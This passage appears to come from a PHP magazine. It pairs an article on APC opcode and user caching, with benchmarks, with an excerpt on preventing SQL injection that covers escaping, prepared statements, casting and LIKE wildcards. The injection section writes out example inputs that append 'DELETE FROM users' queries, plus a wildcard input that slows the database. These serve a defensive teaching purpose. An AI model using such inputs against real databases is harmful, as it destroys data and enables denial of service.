apc.enable_cli=1
LISTING 3
collection. You can also invert the meaning of the exclusion
filter by setting apc.cache_by_default to 0. In this mode,
APC will only cache files that do match the regular
expressions you provide in the apc.filters setting.
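The filter semantics described above can be modelled in a few lines of PHP. This is a sketch of the behaviour as the text describes it, not APC's internal code: should_cache() is a hypothetical helper, and PCRE (preg_match) is used here as a stand-in for whatever regex engine APC itself uses.

```php
<?php
// Hypothetical helper that mirrors the behaviour described in the text.
// $filters is the comma-separated regex list from apc.filters.
function should_cache($path, $filters, $cacheByDefault = true)
{
    $matched = false;
    foreach (array_filter(explode(',', $filters)) as $regex) {
        // '#' is the delimiter so that '/' in paths needs no escaping.
        if (preg_match('#' . $regex . '#', $path)) {
            $matched = true;
            break;
        }
    }
    // Default mode: a match excludes the file.
    // Inverted mode (cache_by_default = 0): only matches are cached.
    return $cacheByDefault ? !$matched : $matched;
}

var_dump(should_cache('/var/www/tmp/counter.php', '/tmp/,\.inc$'));     // bool(false)
var_dump(should_cache('/var/www/index.php', '/tmp/,\.inc$'));           // bool(true)
var_dump(should_cache('/var/www/index.php', '^/var/www/index', false)); // bool(true)
```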
If you are unlucky enough to be on Windows, you can
grab the latest build of APC from
Click on the PECL link that matches the PHP version you
are on (near the bottom). Configuration-wise, a Windows
setup is similar, except the mmap option doesn’t apply.
The APC Info Page
In the pecl/apc directory, you will find a script called
apc.php (Figure 1). This file, when executed, gives you a
nice overview of what is in your cache, and how much of your
shared memory segment is being used. It would probably be a
good idea to put this script behind htaccess authentication
if you are going to put it in a web-accessible directory,
but it also has its own built-in auth system. Read the first
section of the code in apc.php itself for more information.
Uniquely Identifying Files
A file, whether it is the initial script file, or an included
file, is identified by its device and inode (the file’s
unique position identifier within the filesystem), not its
filename.
This method is used so that files can be uniquely identified
in a single stat() call. If we were to try to differentiate
files by their filename, we would need the fully qualified
pathname, and that can be extremely expensive to get, since
it would involve calling realpath() which, in turn, calls
stat() for every component of the path in order to resolve
any symbolic links that it might discover. By using the
file’s inode, we get it down to a single stat call per file.
When PHP and APC are nested within an Apache process, there
is no additional stat(), since Apache will have already made
this call, and APC inherits the stat structure directly from
Apache. This means that, for PHP scripts that don’t include
anything, APC eliminates all disk-touching system calls
after Apache has handed the request over to PHP. This
additional optimization makes for speedy caching.
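The same idea can be tried from userspace with PHP's own stat() function, which returns the device and inode numbers alongside the other file metadata. The file_identity() helper below is a hypothetical name used for illustration; APC does this work internally in C.

```php
<?php
// Build an identity key from a file's device and inode numbers.
// file_identity() is a hypothetical helper, not part of APC.
function file_identity($path)
{
    $st = @stat($path);      // one call, no path resolution needed
    if ($st === false) {
        return null;         // file does not exist or is unreadable
    }
    return $st['dev'] . ':' . $st['ino'];
}

$file = tempnam(sys_get_temp_dir(), 'apc');
echo file_identity($file), "\n";   // the actual numbers vary per system
unlink($file);
```

On filesystems that do not expose inode numbers, the 'ino' element may be 0, so the key is only meaningful on UNIX-like systems.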
Updating Files on a Live Web Server
People tend to not pay enough attention to how they
update files on their web server.
This is a problem, regardless of the presence of an
opcode cache. If you fire up your favourite text editor
and edit a PHP script on your live web server, not
only is there a good chance that you will break your
actual code on the first try, but more importantly, your
editor probably does not write the file to the filesystem
atomically when you are done. That means that requests
for the file you are saving may end up getting a partially
written file. File writes tend to be pretty fast, so even
on a busy server this should only affect a few requests.
However, if you throw an opcode cache into the mix,
you could end up caching this partially written file so
all subsequent requests will get the same partial set of
opcodes from the cache.
In order to reduce the impact of this scenario, APC has an
option called file_update_protection. This feature is
enabled, and set to 2 seconds, by default, meaning that
files that have been modified within 2 seconds of the
request will not be cached. This should prevent any
partially written files from polluting the cache.
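The check itself amounts to a comparison of two timestamps. A minimal sketch, assuming a hypothetical is_too_fresh() helper (APC performs the equivalent test internally):

```php
<?php
// Skip caching when the file was modified less than $window seconds
// before the request. is_too_fresh() is a hypothetical name.
function is_too_fresh($mtime, $requestTime, $window = 2)
{
    return ($requestTime - $mtime) < $window;
}

$now = time();
var_dump(is_too_fresh($now - 1, $now));   // bool(true): modified 1 second ago
var_dump(is_too_fresh($now - 60, $now));  // bool(false): safe to cache
```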
Employing this feature, however, doesn’t fix the real
problem: non-atomic file modification on a live web server.
The correct way to address this issue is to only replace
files atomically, by writing to a temp file and then
renaming the file to its intended destination filename, or
by using automated tools such as rsync that correctly handle
the details of this maneuver for you. UNIX commands and
applications such as cp, tar, vi and emacs often do not
create files atomically.
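The write-then-rename approach can be sketched in PHP itself. atomic_write() is a hypothetical helper name, and the sketch assumes a POSIX filesystem, where rename() within one filesystem replaces the destination in a single step.

```php
<?php
// Replace $target atomically: write a temporary file in the same
// directory, then rename() it over the destination.
function atomic_write($target, $contents)
{
    // Same directory keeps both paths on one filesystem.
    $tmp = tempnam(dirname($target), 'tmp');
    if ($tmp === false) {
        return false;
    }
    if (file_put_contents($tmp, $contents) === false) {
        unlink($tmp);
        return false;
    }
    chmod($tmp, 0644);   // tempnam() creates the file with mode 0600
    return rename($tmp, $target);
}

$target = sys_get_temp_dir() . '/atomic_demo.txt';
atomic_write($target, "version 2\n");
echo file_get_contents($target);   // version 2
unlink($target);
```

A reader of $target sees either the old contents or the new contents, never a half-written file.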
Cache Slams
Another often-overlooked issue occurs when files on a
very busy server are changed.
Imagine a server whose front page gets hit hundreds
of times per second. When you modify that front page
file, many requests will see that the cached opcodes are
now stale and will attempt to compile and cache the
script from disk. APC doesn’t really mind this, as it is
smart enough to avoid any sort of race conditions during
the compile and cache procedure, so you will never end
up with an inconsistent cache. However, each request
that tries to cache a script starts allocating memory in
the cache at the same time. Once all the small chunks of
memory have been allocated and populated correctly, the
cache entry gets activated atomically and any previous
entries for the same file get put on a deleted list
and deleted when everyone is done accessing it. This
means that modifying files on a busy server can lead
to many simultaneous memory allocations and you could
potentially fill up your shared memory segment because
of multiple concurrent requests all attempting to cache
the same file, at approximately the same time.
APC attempts to reduce the negative effects of this
situation with a slam_defense option that can be set to a
percentage between 0 and 100, indicating the likelihood that
a request that hits an uncached file will skip trying to
cache it. Very much like the file_update_protection setting,
this is a mechanism to ease the pain of something that
really should be handled differently by the user (the person
who deploys the changed file, in this case). You can
completely eliminate both the partial update and the cache
slam problems by writing to a temporary file first; then,
load that temporary file once through your webserver (and
thus, APC) to force it to be cached, and then rename the
file to its final destination. You might expect that the
file would be re-cached once its name is changed, but recall
that APC uses the device and inode of the file, not its
name, to uniquely identify it. When you rename a file, the
inode doesn’t change, nor does the modification time.
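The probabilistic nature of slam_defense can be modelled as follows. This is a simulation under stated assumptions, not APC's code: skip_caching() is a hypothetical function, and mt_rand() stands in for whatever random source APC uses.

```php
<?php
// Hypothetical model of slam_defense: $percent is the chance (0 to 100)
// that a request skips caching an uncached file.
function skip_caching($percent)
{
    // mt_rand(0, 99) yields 100 equally likely values, so exactly
    // $percent of them fall below $percent.
    return mt_rand(0, 99) < $percent;
}

$skipped = 0;
for ($i = 0; $i < 1000; $i++) {
    if (skip_caching(75)) {
        $skipped++;
    }
}
echo "Skipped {$skipped} of 1000 simulated requests\n"; // roughly 750
```

At 0 no request ever skips, and at 100 every request does, which matches the two ends of the range described above.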
Userspace Access to the Cache
There are a couple of ways to make use of the cache from
your userspace PHP scripts.
The first way is to poke it for information about what it is
doing. The apc.php script that comes with APC is an example
of how to use the apc_cache_info() and apc_sma_info()
functions. These return an array that contains information
about objects stored in the cache and the amount of memory
that each of these objects is using. apc_clear_cache() lets
you remove all entries from the cache, without needing to
restart your server. Normally you wouldn’t need to call this
function.
The apc_store() and apc_fetch() functions are much more
interesting. These allow you to store your own data in the
cache. Generally, you will want to use these functions for
relatively small amounts of data that is used repeatedly,
and is expensive to generate. For example, you might have an
XML-based configuration file for your application. People
have tended to shy away from this in the past, but with the
simplexml extension in PHP 5, it is extremely easy to write
a parser, and with APC storing the parsed config array, it
is also blazingly fast. Take this sample config file:
<config>
  <section name="paths">
    <top>/var/www</top>
    <include>/usr/share/php</include>
  </section>
  <section name="database">
    <host>localhost</host>
    <username>root</username>
  </section>
</config>
The parser for this is basically a one-liner. Well, a
slightly long line, split up into 3 to make it easier to
read. Ok, so it is a 3-liner:
$xml = simplexml_load_file('conf.xml');
foreach($xml->section as $entry)
  $config[(string)$entry['name']] = (array)$entry;
FIGURE 1 (the apc.php info page)
This should be mostly self-explanatory: Load the XML file
using simplexml, loop through each section and use the
$entry['name'] shortcut for picking the name attribute out
of the entry, and make this name the key for each section
sub-array. Then, since below each section in our example we
just have flat XML with neither attributes nor sub-nodes, we
can just cast it directly to an array and stick the data
directly into our $config array. If you have a completely
flat XML config file, you could just cast $xml directly to
an array and you are done, but usually configuration files
are slightly more complex, and you need to decide how to
deal with attributes and what you want your final array to
look like. The above three lines give us an array like this:
Array (
[paths] => Array (
[top] => /var/www
[include] => /usr/share/php
)
[database] => Array (
[host] => localhost
[username] => root
)
)
Now we can add apc_store()/apc_fetch() caching and our
entire XML-based parsing and caching solution becomes:
if(!$config=apc_fetch('config')) {
  $xml = simplexml_load_file('conf.xml');
  foreach($xml->section as $entry)
    $config[(string)$entry['name']] = (array)$entry;
  apc_store('config',$config);
}
You may want to add a bit of error checking to make sure
that the conf.xml file actually exists, and if you are going
to do that, it means a stat() call. You might as well make
use of that extra system call and pull in the modification
time, using filemtime(). So, our final approach would look
like this:
$mtime=@filemtime('conf.xml') or die("conf.xml is missing!");
if((!$config=apc_fetch('config'))||$config['mtime']<$mtime) {
  $xml = simplexml_load_file('conf.xml');
  // start from a fresh array so stale sections are dropped
  $config = array('mtime' => time());
  foreach($xml->section as $entry)
    $config[(string)$entry['name']] = (array)$entry;
  apc_store('config',$config);
}
Now we can change our conf.xml file all we want, and it will
be reparsed on the request that immediately follows the
change, and cached in shared memory between changes.
apc_store() takes a third optional argument, which is the
number of seconds to cache the passed data. This makes it
easy to use the store/fetch method for caching remote data
where you want to fetch a new version every 30 minutes, for
example.
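For readers who want to try the pattern on a machine without APC, here is a self-contained sketch. The cache_fetch() and cache_store() wrappers, the LocalCache class and load_config() are all hypothetical names introduced for this example. Two deliberate differences from the code above: the cached entry records the file's own modification time rather than time(), and child elements are copied explicitly instead of casting each section to an array.

```php
<?php
// Fallback store used when the APC extension is not loaded.
class LocalCache { public static $data = array(); }

function cache_fetch($key)
{
    if (function_exists('apc_fetch')) {
        return apc_fetch($key);
    }
    return isset(LocalCache::$data[$key]) ? LocalCache::$data[$key] : false;
}

function cache_store($key, $value, $ttl = 0)
{
    if (function_exists('apc_store')) {
        return apc_store($key, $value, $ttl);  // third argument: TTL in seconds
    }
    LocalCache::$data[$key] = $value;          // the fallback ignores $ttl
    return true;
}

// Parse the XML file only when no cached copy exists or the file is newer.
function load_config($file)
{
    $mtime = @filemtime($file);
    if ($mtime === false) {
        return false;                          // file is missing
    }
    $config = cache_fetch('config:' . $file);
    if ($config === false || $config['mtime'] < $mtime) {
        $config = array('mtime' => $mtime);
        foreach (simplexml_load_file($file)->section as $section) {
            foreach ($section->children() as $name => $value) {
                $config[(string) $section['name']][$name] = (string) $value;
            }
        }
        cache_store('config:' . $file, $config, 1800);
    }
    return $config;
}

$file = tempnam(sys_get_temp_dir(), 'cfg');
file_put_contents($file,
    '<config><section name="paths"><top>/var/www</top></section></config>');
$config = load_config($file);
echo $config['paths']['top'], "\n";   // /var/www
unlink($file);
```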
Real-World Performance Numbers
Let’s look at 4 examples of what you can expect when
you add APC to your system.
First a common photo album application: Gallery
(version 1). With no opcode cache, hitting a page of an
album in Gallery with 9 photos on it, yields just over
9 requests per second. That’s not very fast. Although,
looking at it a different way, it is about 800,000 requests/
day. Of course, that is just for the HTML for that album
page and doesn’t include all of the extra requests needed
to fetch each thumbnail and whatever other images are
on there. Still, it is probably more than fast enough for
your family album. But, faster is always better. Adding
APC gets us up to 30 requests/second, without changing
a single line of code. At these speeds, you do notice
a difference. An application that normally attains 30
requests/second, versus one that puts out 10 requests/
second, feels snappier. Or turn it around: 33ms to finish
a request vs. 110ms.
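The conversions used above are simple arithmetic, shown here as a small sketch. The helper names are made up for this example, and the latency figure assumes requests are served one at a time.

```php
<?php
// Convert a throughput figure into per-request latency and daily volume.
function ms_per_request($requestsPerSecond)
{
    return 1000 / $requestsPerSecond;
}

function requests_per_day($requestsPerSecond)
{
    return $requestsPerSecond * 86400;   // 60 * 60 * 24 seconds
}

printf("%.0f ms\n", ms_per_request(30));            // 33 ms
printf("%.0f ms\n", ms_per_request(9));             // 111 ms
printf("%d requests/day\n", requests_per_day(9));   // 777600 requests/day
```

At "just over 9" requests per second the daily figure lands near the 800,000 quoted above.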
With a slight tweak, we can bring this up to about 32
requests/second. Not much of an improvement. The low-
hanging fruit is usually the configuration information for
an application like this. Unfortunately, Gallery stores its
config in nested classes that will need to be serialized
and unserialized. Improving on this makes Gallery a bit
faster, but probably not worth the maintenance headache
of having locally modified files. It is just a couple of
lines in Gallery’s config.php file, though. At the top:
if($tmp = apc_fetch('gallery')) {
  $gallery=unserialize($tmp);
  return;
}
And at the bottom:
apc_store('gallery',serialize($gallery));
You get a bigger win with applications that use arrays
for their configuration—especially if they have localized
the config file inclusion to one or two places so you can
eliminate an entire include with something like:
if(!$config=apc_fetch('config')) include 'config.inc';
And, of course, at the bottom of config.inc you would
need to add:
apc_store('config',$config);
This serialization of objects will soon be done by APC
internally, so it will go a bit faster by eliminating the
extra userspace unserialize call, but it will still be
nowhere near as fast as using an array that gets copied
directly out of shared memory.
FUDforum-2.6 is a popular bulletin board application.
Without APC, viewing a message thread with a couple of
messages in it gets me 46 requests/second. Turning on APC
brings that up to 160 requests/second. Looking at FUDforum’s
config system, it (unfortunately) uses a bunch of global
variables in a file called GLOBALS.php. This file also
includes a bunch of other things, and it is included from
all over, so it isn’t easy to eliminate the include call,
nor is it easy to cache the actual config variables. But it
can be done. At the top of GLOBALS.php we can add:
if(!$globals = apc_fetch('globals')) {
  $cnt = count($GLOBALS)+1;
And at the bottom:
  $globals = array_slice($GLOBALS,$cnt);
  apc_store('globals',$globals);
} else extract($globals);
The main performance problem here is the need to do the
extract(). In the end, this slows us down to about 153
requests/second. If there were heavier logic and perhaps an
SQL query or some XML parsing involved in creating the list
of variables, then this approach would have helped.
Serendipity—also known as s9y—is an application
for people who want to host their own weblogs. I get
10 requests/second on a plain PHP installation, and
37 requests/second after adding APC. Although the
configuration system is array-based, there is plenty of
logic intertwined, so it is also difficult to cache this
information in s9y.
Finally, let’s look at a code snippet written with APC
in mind. I recently needed a flexible and fast RSS/Atom
feed reader. It uses simplexml and a couple of PHP 5.1
tricks to reduce the RSS or Atom XML data down into
an easily cacheable array. The code is a bit long to
include here, but fire up a browser and have a look at it–
The inline comments
should help make sense of the code. It is basically just a
complicated example of the XML-based config file parser
we developed earlier, but now, we get some numbers.
You will notice there are two levels of caching.
It caches the parsed XML to shared memory with apc_store()
and it also caches the downloaded raw XML
to disk. I tend to do this because I have multiple things
reading these various XML files and they sometimes have
different ideas of what is interesting in them. This way I
can have different parsers that parse the disk-cached XML
into their own shared memory slots, but don’t need to hit
the backend server for each separate application. On my
lerdorf.com server I have ,
and itself all
wanting to access some of the same XML files in very
different ways.
Now, for the numbers: I am using my RSS2 feed
from as the sample XML file.
Without any caching at all—not even disk-based raw
XML caching—I get about 25 requests per second. But
that number is very variable, depending on the amount
of traffic on the remote server, and general network
latency issues. It is clear that fetching the entire remote
76kB XML file on every request is not a smart thing
to do. Simply caching the XML data between requests
brings that number way up to 165 requests per second.
Finally, and most dramatically, adding apc_store() and
apc_fetch() takes us to 550 requests/second. This brings us
to the point where getting a 76kB XML feed into an easily
walkable array is basically free, from a performance
perspective. That’s less than 2ms per end-to-end request on
a rather low-end 1.8GHz Athlon box with IDE drives, running
Ubuntu Linux, and an untuned default Apache install. Turning
off Keepalive, and changing MaxRequestsPerChild from its
default 100 to 0 (unlimited), brings that number up to 590
requests per second.
Conclusion: Speed is Good!
Opcode caching plus injecting user caching in the
right places in your application can result in dramatic
performance gains.
In my RSS example, I went from 25 requests/second
to nearly 600. In a full application, there are performance
gains to be had all along the way. You need to look at
where your data comes from, how often it changes, and
how close to the final presentation format you can get
it to, before it is cached. Applications that were not
designed with this in mind from the start can be difficult
to retrofit. Keep your designs simple and clean. Do not
use objects as datastores, and try to avoid spaghetti
include sequences—your applications will be easier to
deploy and will run much faster.
SQL Injection
FEATURE
The goal of SQL injection is to insert arbitrary
data, most often a database query, into a string
that’s eventually executed by the database.
The insidious query may attempt any number
of actions, from retrieving alternate data, to
modifying or removing information from the database.
To demonstrate the problem, consider this excerpt:
// supposed input
$name = "ilia'; DELETE FROM users;";
mysql_query("SELECT * FROM users WHERE name='{$name}'");
The function call is supposed to retrieve a record from the
users table where the name column matches the name specified
by the user. Under normal circumstances, $name would only
contain alphanumeric characters and perhaps spaces, such as
the string ilia. But here, by appending an entirely new
query to $name, the call to the database turns into
disaster: the injected DELETE query removes all records from
users.
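Printing the assembled string makes the problem visible. The sketch below builds the query exactly as the excerpt does but only echoes it, so no database connection is involved.

```php
<?php
// Build the query as in the excerpt and show what the database
// would actually receive.
$name  = "ilia'; DELETE FROM users;";
$query = "SELECT * FROM users WHERE name='{$name}'";

echo $query, "\n";
// SELECT * FROM users WHERE name='ilia'; DELETE FROM users;'
```

The quote supplied by the user closes the string literal early, and everything after it is read as SQL rather than as data.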
MySQL Exception
Fortunately, if you use MySQL, the mysql_query() function
does not permit query stacking, or executing multiple
queries in a single function call. If you try to stack
queries, the call fails.
However, other PHP database extensions, such as
SQLite and PostgreSQL, happily perform stacked queries,
executing all of the queries provided in one string and
creating a serious security problem.
SQL injection is a common vulnerability that is the result of lax
input validation. In this excerpted chapter from
php|architect’s Guide to PHP Security, you will learn how to thwart
this type of attack.
by
ILIA ALSHANETSKY
author of
php|architect’s
Guide to PHP Security
SQL INJECTION
Magic Quotes
Given the potential harm that can be caused by SQL
injection, PHP’s automatic input escape mechanism,
magic_quotes_gpc, provides some rudimentary protection. If
enabled, magic_quotes_gpc, or “magic quotes”, adds a
backslash in front of single-quotes, double-quotes, and
other characters that could be used to break out of a value
identifier. But magic quotes is a generic solution that
doesn’t include all of the characters that require escaping,
and the feature isn’t always enabled. Ultimately, it’s up to
you to implement safeguards to protect against SQL
injection.
To help, many of the database extensions available for PHP
include dedicated, customized escape mechanisms. For
example, the MySQL extension for PHP provides the function
mysql_real_escape_string() to escape input characters that
are special to MySQL:
if (get_magic_quotes_gpc()) {
  $name = stripslashes($name);
}
$name = mysql_real_escape_string($name);
mysql_query("SELECT * FROM users WHERE name='{$name}'");
However, before calling a database’s own escaping mechanism,
it’s important to check the state of magic quotes. If magic
quotes is enabled, remove any backslashes (\) it may have
added; otherwise, the input will be doubly-escaped,
effectively corrupting it (because it differs from the input
supplied by the user).
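The double-escaping effect is easy to reproduce. In this sketch addslashes() stands in for both magic quotes and the database's escape function, since neither is available without the relevant configuration or connection; the real functions escape a somewhat different set of characters.

```php
<?php
// addslashes() is a stand-in for magic quotes and for the database
// escape function; it is used here only to show the doubling effect.
$input = "O'Reilly";

$magic   = addslashes($input);               // what magic quotes would deliver
$doubled = addslashes($magic);               // escaped again: corrupted
$correct = addslashes(stripslashes($magic)); // undo magic quotes first

echo $magic, "\n";    // O\'Reilly
echo $doubled, "\n";  // O\\\'Reilly
echo $correct, "\n";  // O\'Reilly
```

The doubled version stores a literal backslash in the database, which is the corruption the paragraph above warns about.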
In addition to securing input, a database-specific escape
function prevents data corruption. For example, the escape
function provided in the MySQL extension is aware of the
connection’s character set and escapes input accordingly, to
ensure that data isn’t corrupted by the MySQL storage
mechanism and vice versa.
Native escape functions are also invaluable for
storing binary data: left “unescaped”, some binary data
may conflict with the database’s own storage format,
leading to the corruption or loss of a table or the entire
database. Some database systems, such as PostgreSQL, offer a
dedicated function to encode binary data. Rather than escape
only the problematic characters, the function applies an
internal encoding. For instance, PostgreSQL’s
pg_escape_bytea() function re-encodes binary data as
text-safe escape sequences:
// for plain-text data use:
pg_escape_string($regular_strings);
// for binary data use:
pg_escape_bytea($binary_data);
A binary data escaping mechanism should also be used
to process multi-byte languages that aren’t supported
natively by the database system. (Multi-byte languages
such as Japanese use multiple bytes to represent a single
character; some of those bytes overlap with the ASCII
range normally only used by binary data.)
There’s a disadvantage to encoding binary data: it prevents
persisted data from being searched other than by a direct
match. This means that a partial match query such as
LIKE 'foo%' won’t work, since the encoded value stored in
the database won’t necessarily match the initial encoded
portion looked for by the query.
For most applications, though, this limitation isn’t a
major problem, as partial searches are generally reserved
for human readable data and not binary data, such as
images and compressed files.
Prepared Statements
While database-specific escape functions are useful, not
all databases provide such a feature. In fact, database-
specific escape functions are relatively rare. (At the
moment) only the MySQL, PostgreSQL, SQLite, Sybase,
and MaxDB extensions provide them. For other databases,
including Oracle, Microsoft SQL Server, and others, an
alternate solution is required.
A common technique is to Base64-encode all values passed to
the database, thus preventing any special characters from
corrupting the underlying store or causing trouble. But
Base64-encoding expands data roughly 33 percent, requiring
larger columns and more storage space. Furthermore,
Base64-encoded data has the same problem as binary encoded
data in PostgreSQL: it cannot be searched with LIKE. Clearly
a better solution is needed: something that prevents
incoming data from affecting the syntax of the query.
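Both drawbacks can be checked with PHP's base64_encode(). The sketch below is an illustration with made-up sample values.

```php
<?php
// Size overhead: every 3 input bytes become 4 output characters.
$raw = str_repeat('x', 300);
echo strlen(base64_encode($raw)), "\n";   // 400

// Prefix searches break: the encoding of a prefix is not necessarily
// a prefix of the encoding of the full value.
$full   = base64_encode('foobar');   // Zm9vYmFy
$prefix = base64_encode('fo');       // Zm8=
var_dump(strpos($full, $prefix) === 0);   // bool(false)
```

A search for values starting with "fo" would therefore miss "foobar" once both sides are encoded.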
Prepared queries (also called prepared statements) solve a
great many of the aforementioned risks. Prepared queries are
query “templates”: the structure of the query is pre-defined
and fixed, and includes placeholders that stand in for real
data. The placeholders are typically type-specific (for
example, int for integer data and text for strings), which
allows the database to interpret the data strictly. For
instance, a text placeholder is always interpreted as a
literal, avoiding exploits such as the query stacking SQL
injection. A mismatch between a placeholder’s type and its
incoming datum causes execution errors, adding further
validation to the query.
In addition to enhancing query safety, prepared queries
improve performance. Each prepared query is parsed and
compiled once, but can be re-used over and over. If you need
to perform an INSERT en masse, a pre-compiled query can save
valuable execution time.
Preparing a query is fairly simple. Here is an example:
pg_query($conn, "PREPARE stmt_name (text) AS "
  . "SELECT * FROM users WHERE name=$1");
// EXECUTE takes SQL literals, so quote and escape the value
$name = pg_escape_string($name);
pg_query($conn, "EXECUTE stmt_name ('{$name}')");
pg_query($conn, "DEALLOCATE stmt_name");
PREPARE stmt_name (text) AS ... creates a prepared query
named stmt_name that expects one text value. Everything
following the keyword AS defines the actual query, in which
$1 is the placeholder for the expected text.
If a prepared statement expects more than one value, list
each type in order, separated by a comma, and use $1, $2,
and so on for each placeholder, as in
PREPARE stmt_example (text, int) AS SELECT * FROM users
WHERE name=$1 AND id=$2.
Once compiled with PREPARE, you can run the prepared query
with EXECUTE. Specify two arguments: the name of the
prepared statement (such as stmt_name) to run and a list of
actual values enclosed in parentheses.
Once you’re finished with the prepared statement, dispose of
it with DEALLOCATE. Forgetting to jettison prepared queries
can cause future PREPARE queries to fail. This is a common
error when persistent database connections are used, where a
statement can persist across requests. For example, given
that there is no way to check if a statement exists or not,
a blind attempt to create one anyway will trigger a query
error if one is already present.
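The same idea can be tried without a PostgreSQL server. The sketch below swaps in a different technique from the one shown above: it uses the PDO extension with an in-memory SQLite database, and it assumes the pdo_sqlite driver is installed. PDO passes the value separately from the query text, so no quoting or escaping of the input is needed.

```php
<?php
// Assumption: pdo_sqlite is available. An in-memory SQLite database
// replaces the PostgreSQL connection used in the article.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)");
$db->exec("INSERT INTO users (name) VALUES ('ilia')");

// The query structure is fixed; the ? placeholder only ever carries data.
$stmt = $db->prepare("SELECT * FROM users WHERE name = ?");

$stmt->execute(array("ilia'; DELETE FROM users;"));
var_dump(count($stmt->fetchAll()));   // int(0): hostile input matches nothing

$stmt->execute(array("ilia"));        // the same statement is reused
var_dump(count($stmt->fetchAll()));   // int(1): the table is intact
```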
As nice as prepared queries are, not all databases
support them; in those instances escaping mechanisms
should be used.
No Means of Escape
Alas, escape functions do not always guarantee data
safety. Certain queries can still permit SQL injection,
even after escapes are applied.
Consider the following situation, where a query
expects an integer value:
$id = "0; DELETE FROM users";
$id = mysql_real_escape_string($id); // 0; DELETE FROM users
mysql_query("SELECT * FROM users WHERE id={$id}");
When executing integer expressions, it’s not necessary to
enclose the value inside single quotes. Consequently, the
semicolon character is sufficient to terminate the query and
inject an additional query. Since the semicolon doesn’t have
any “special” meaning, it’s left as-is by both the database
escape function and addslashes().
There are two possible solutions to the problem.
The first requires you to quote all arguments. Since
single quotes are always escaped, this technique prevents
SQL injection. However, quoting still passes the user
input to the database, which is likely to reject the query.
Here is an illustrative example:
$id = "0; DELETE FROM users";
$id = pg_escape_string($id); // 0; DELETE FROM users
pg_query($conn, "SELECT * FROM users WHERE id='{$id}'")
  or die(pg_last_error($conn));
// will print invalid input syntax for integer:
// "0; DELETE FROM users"
But query failures are easily avoided, especially when
validation of the query arguments is so simple. Rather
than pass bogus values to the database, use a PHP cast
to ensure each datum converts successfully to the desired
numeric form.
For example, if an integer is required, cast the incoming
datum to an int; if a floating-point number is required,
cast to a float.
$id = "123; DELETE FROM users";
$id = (int) $id; // 123
pg_query($conn, "SELECT * FROM users WHERE id={$id}");
// safe
A cast forces PHP to perform a type conversion. If the input
is not entirely numeric, only the leading numeric portion is
used. If the input doesn’t start with a numeric value or if
the input is only alphabetic and punctuation characters, the
result of the cast is 0. On the other hand, if the cast is
successful, the input is a valid numeric value and no
further escaping is needed.
Numeric casting is not only very effective, it’s
also efficient, since a cast is a very fast, function-free
operation that also obviates the need to call an escape
routine.
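The casting rules are easy to verify without a database. The second half of this sketch goes beyond the article's technique: filter_var() with FILTER_VALIDATE_INT is shown as a stricter option that rejects mixed input instead of truncating it.

```php
<?php
// A cast keeps the leading numeric portion and discards the rest.
var_dump((int) "123; DELETE FROM users");  // int(123)
var_dump((int) "DELETE FROM users");       // int(0)

// Stricter alternative (an addition to the article's technique):
// reject input that is not entirely an integer.
var_dump(filter_var("123; DELETE FROM users", FILTER_VALIDATE_INT)); // bool(false)
var_dump(filter_var("123", FILTER_VALIDATE_INT));                    // int(123)
```

Which of the two fits depends on whether silently querying for id 123 or 0 is acceptable, or whether bad input should be refused outright.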
The LIKE Quandary
The SQL LIKE operator is extremely valuable: its % and _
(underscore) qualifiers match 0 or more characters and any
single character, respectively, allowing for flexible
partial and substring matches. However, both LIKE qualifiers
are ignored by the database’s own escape functions and PHP’s
magic quotes. Consequently, user input incorporated into a
LIKE query parameter can subvert the query, complicate the
LIKE match, and in many cases, prevent the use of indices,
which slows a query substantially. With a few iterations, a
compromised LIKE query could launch a Denial of Service
attack by overloading the database.
Here’s a simple yet effective attack:
$sub = mysql_real_escape_string("%something");
// still %something
mysql_query("SELECT * FROM messages "
  . "WHERE subject LIKE '{$sub}%'");
The intent of the SELECT above is to find those messages
that begin with the user-specified string, $sub.
Uncompromised, that SELECT query would be quite fast,
because the index for subject facilitates the search. But if
$sub is altered to include a leading % qualifier (for
example), the query can’t use the index and the query takes
far longer to execute. Indeed, the query gets progressively
slower as the amount of data in the table grows.
The underscore qualifier presents both a similar and a
different problem. A leading underscore in a search pattern,
as in _ish, cannot be accelerated by the index, slowing the
query. And a trailing underscore may substantially alter the
results of the query. To complicate matters further,
underscore is a very common character and is frequently
found in perfectly valid input.
To address the LIKE quandary, a custom escaping mechanism
must convert user-supplied % and _ characters to literals.
Use addcslashes(), a function that lets you specify a
character range to escape.
$sub = addcslashes(
  mysql_real_escape_string("%something_"), "%_");
// $sub == \%something\_
mysql_query("SELECT * FROM messages "
  . "WHERE subject LIKE '{$sub}%'");
Here, the input is processed by the database’s prescribed
escape function and is then filtered through addcslashes()
to escape all occurrences of % and _. addcslashes() works
like a custom addslashes(), is fairly efficient, and is a
much faster alternative to str_replace() or the equivalent
regular expression.
Remember to apply manual filters after the SQL
filters to avoid escaping the backslashes; otherwise,
the escapes are escaped, rendering the backslashes as
literals and causing special characters to re-acquire
special meanings.
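The ordering rule is easy to get backwards, so here is a minimal sketch of both orders side by side. The helper name escape_like_wildcards() is hypothetical, and addslashes() stands in for the database's escape function only so that the sketch runs without a connection; it is an assumption for illustration, not a recommendation.

```php
<?php
// Hypothetical helper (not part of PHP or MySQL): escapes the LIKE
// wildcards % and _ in a string that was ALREADY SQL-escaped.
function escape_like_wildcards($sqlEscaped)
{
    // addcslashes() puts a backslash before each listed character.
    return addcslashes($sqlEscaped, '%_');
}

// Assumption: addslashes() is only a stand-in for the database's own
// escape function so this runs without a connection.
$input = "50%_off's";

// Correct order: SQL escape first, LIKE wildcards second.
$right = escape_like_wildcards(addslashes($input));

// Wrong order: the SQL escape doubles the backslashes added for % and _,
// so both characters act as wildcards again.
$wrong = addslashes(escape_like_wildcards($input));

echo $right, "\n"; // 50\%\_off\'s
echo $wrong, "\n"; // 50\\%\\_off\'s
```

In the second result each wildcard is preceded by an escaped backslash rather than being escaped itself, which is exactly the failure described above.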
SQL Error Handling
One common way for hackers to spot code vulnerable
to SQL injection is by using the developer’s own tools
against them. For example, to simplify debugging of
failed SQL queries, many developers echo the failed query
and the database error to the screen and terminate the
script.
mysql_query($query)
    or die("Failed query: {$query}<br />" . mysql_error());
While very convenient for spotting errors, this code can
cause several problems when deployed in a production
environment. (Yes, errors do occur in production code
for any number of reasons.) Besides being embarrassing,
the code may reveal a great deal of information about the
application or the site. For instance, the end-user may be
able to discern the structure of the table and some of its
fields and may be able to map GET/POST parameters to data
